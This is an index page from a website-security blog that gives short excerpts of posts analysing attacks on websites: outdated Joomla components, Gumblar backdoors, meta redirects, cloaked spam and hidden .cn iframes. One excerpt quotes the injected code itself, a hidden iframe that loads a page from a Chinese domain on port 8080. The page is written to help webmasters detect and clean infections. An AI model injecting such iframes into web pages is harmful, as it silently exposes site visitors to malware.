Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
Loading site search ...

Invasion of JCE Bots

27 Jan 14   Filed in Website exploits with 8 Comments

Joomla has been one of the most popular CMS for a long time.  It powers a huge number of sites.  That’s great! The flip side of this fact is Joomla has been very popular for a long time and there are still very many sites that use older versions of Joomla as well as older version of Joomla components. For example, the 1.5.x branch of Joomla (2008-2010) still has a noticeable share in live Joomla sites.

Old versions may work well for your site but they have multiple well known security holes, so they are the low hanging fruit for hackers. Let me show this using a real world example.

Continue »»

Two Tweet Weeks: April 18 – May1, 2011

02 May 11   Filed in Tweet Week with Comments Off on Two Tweet Weeks: April 18 – May1, 2011

Selected short messages and links you might have missed if you don’t follow me on Twitter.

new MS anti-virus, security updates, #RoyalWedding search results poisoning …

Update on redef_colors/createCSS attack: PHP code, Backdoors and osCommerce.

07 Apr 11   Filed in Website exploits with 4 Comments

A few days ago, I blogged about the hacker attack that used the BlackHole toolkit and injected “createRSS” and “defs_colors” malicious scripts into legitimate websites. I’ve worked with a few webmasters of infected sites since then and now have some important additional information that I want to share here.
Continue »»

Two Tweet Weeks: August 30 – September 12, 2010

13 Sep 10   Filed in Tweet Week with 1 Comment

Selected short messages and links you might have missed if you don’t follow me on Twitter.

new type of Fake AV, TechCrunch hacked, app vulnerabilities and updates … »»

Revenge of Gumblar Zombies

23 Oct 09   Filed in Website exploits with 50 Comments

Do you remember Gumblar? The massive hacker attack that managed to infect more than a hundred thousand legitimate web sites in a very short time this May? The infection was relatively easy to detect but very hard to completely get rid of. It infected various types of files and created backdoor scripts in inconspicuous places of websites so that hackers could easily restore the malicious content.

The gumblar .cn site (and its immediate successor martuz .cn) had been promptly shut down. As a result,the malicious script injected into hacked websites became harmless for site visitors. However, many webmasters failed to properly clean up their sites after the Gumblar infection, leaving the backdoor scripts intact. It was predicted that hackers would find the way to utilize this army of potentially controllable websites. Now, five months later, we see a new surge of a massive attack that resembles Gumblar in many aspects.
Continue »»

Ncccnnnc .cn – Warning: Not Opera Only

15 Oct 09   Filed in Website exploits with 11 Comments

This is just a quick post to let you know about a new type of server-wide script-injection attack I’ve just discovered.

I found this post on a phpBB forum and decided to check the infected site with Unmask Parasites. The tool reported a suspicious script:
Continue »»

“Cheap Vista” or Cloaked Spam on High-Profile Sites

01 Oct 09   Filed in Website exploits with 12 Comments

In this post, I’ll show how cybercriminals used hacked high-profile sites to drive search traffic to online stores that sell pirated copies of popular software and, presumably, steal credit card details.

I’ve been watching this sort of search spam for more than a year now. And after this post in Google’s Webmaster Help forum, I decided to take a closer look at this this problem.
Continue »»

Goscanpark: 13 Facts About Malicious Server-Wide Meta Redirects.

23 Jul 09   Filed in Website exploits with 85 Comments

I’ve discovered a new emerging malware attack today. Actually two attacks, but in this post I’ll review only one of them – server-wide goscanpark .com/goscansoon .com meta redirects.

I discovered this attack when checked Unmask Parasites logs. I noticed that many unrelated websites contained the same suspicious script so I decided to investigate this issue. The investigation is not complete yet but I think the information I’ve already collected will be useful for owners of compromised web sites. And I hope the missing parts will be added by you, the readers. Update ( July 27, 2009) : the comments are really very informative. make sure to read them.
Continue »»

Hidden CN Iframes Are Still Prevalent

25 Jun 09   Filed in Website exploits with 33 Comments

This post is a reminder that .cn iframe attacks are still among leaders.

The URLs of malicious iframes change over the time. Hackers introduce new suffixes (campaigns?) like : mozila, banner, cocacola, pepsi, add more and more domain names.

Port 8080

Since the pepsi campaign they started using port 8080 in the URLs.

The currently form of the malicious code looks like this

< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>

It is usually injected at the bottom of index (home) pages.
Continue »»

GStats .cn and GCounter .cn – Malicious Code in .js Files

22 Jun 09   Filed in Tips and Tricks, Website exploits with 7 Comments

This must be not a new attack (I’ve found an almost year old article that mentions gcounter iframes) but I started to notice it this past weekend. First, on the Google’s Webmaster Forums, then in the Unmask Parasites logs. So I guess it’s a new wave of the attack.

GCounter .cn

When I first encountered a site infected by gcounter, I checked it with Unmask Parasites. Nothing suspicious was found except for the fact that the domain name was blacklisted by Google. I checked the diagnostic page and found this clue:

Malicious software is hosted on 1 domain(s), including

Continue »»